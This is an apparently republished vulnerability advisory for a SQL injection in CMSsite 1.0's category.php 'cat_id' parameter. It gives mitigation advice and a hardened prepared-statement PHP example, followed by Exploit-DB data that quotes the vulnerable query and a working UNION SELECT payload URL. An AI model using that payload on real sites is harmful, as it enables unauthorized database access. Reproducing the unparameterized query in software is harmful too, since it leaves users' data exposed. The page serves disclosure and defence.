Vendor: CMSsite
By: Majid kalantari
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: CMSsite
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:victoralagwu:cmssite:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2019

CMSsite 1.0 – SQL injection

The CMSsite 1.0 web application is vulnerable to SQL injection in the 'category.php' file. The 'cat_id' GET parameter is placed directly into a SQL query without validation or parameterization, allowing an attacker to inject malicious SQL. By exploiting this vulnerability, an attacker can execute arbitrary SQL commands and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, developers should use parameterized queries (prepared statements), which keep user input separate from the SQL text and so prevent SQL injection. Additionally, input validation and proper error handling should be implemented.
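
A hardened form of the 'cat_id' lookup quoted in the Exploit-DB data on this page, as an added example (not code from the CMSsite project or the advisory author). It assumes `$con` is the application's existing mysqli connection and that 'cat_id' is a positive integer key; the helper names are hypothetical.

```php
<?php
// Added example: hardened form of the cat_id lookup in category.php.
// Assumptions: $con is the application's existing mysqli connection (as in the
// vulnerable snippet) and cat_id is a positive integer key; the helper names
// are hypothetical. get_result() requires the mysqlnd driver.

// Accept only a plain positive integer; anything else yields null.
function parse_category_id($raw): ?int
{
    if (!is_string($raw)) {            // rejects arrays such as cat_id[]=1
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bind the value as an integer parameter instead of interpolating it into SQL.
function fetch_posts_by_category(mysqli $con, int $categoryId): array
{
    $stmt = $con->prepare('SELECT * FROM posts WHERE post_category_id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    $stmt->bind_param('i', $categoryId);
    if (!$stmt->execute()) {
        throw new RuntimeException('execute failed: ' . $stmt->error);
    }
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

$categoryId = parse_category_id($_GET['cat_id'] ?? null);
if ($categoryId === null) {
    http_response_code(400);           // reject non-numeric input up front
    exit('Invalid category.');
}

try {
    $posts = fetch_posts_by_category($con, $categoryId);
} catch (Throwable $e) {
    // Log details server-side; never echo SQL errors to the client.
    error_log('category.php: ' . $e->getMessage());
    http_response_code(500);
    exit('Unable to load category.');
}
```

With this in place, a 'cat_id' value that is not a plain integer is rejected with HTTP 400 before any query runs, and a valid value reaches MySQL only as a bound integer.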

Exploit-DB raw data:

# Exploit Title: CMSsite 1.0 - SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
===============================================

# vulnerable file: category.php
# vulnerable parameter : cat_id

if (isset($_GET['cat_id'])) {
    $category = $_GET['cat_id'];
}
$query = "SELECT * FROM posts WHERE post_category_id=$category";
$run_query = mysqli_query($con, $query);

# payload : http://127.0.0.1/cm/category.php?cat_id=7 UNION SELECT 1,2,user(),3,4,5,6,7,8,9,10%23

===============================================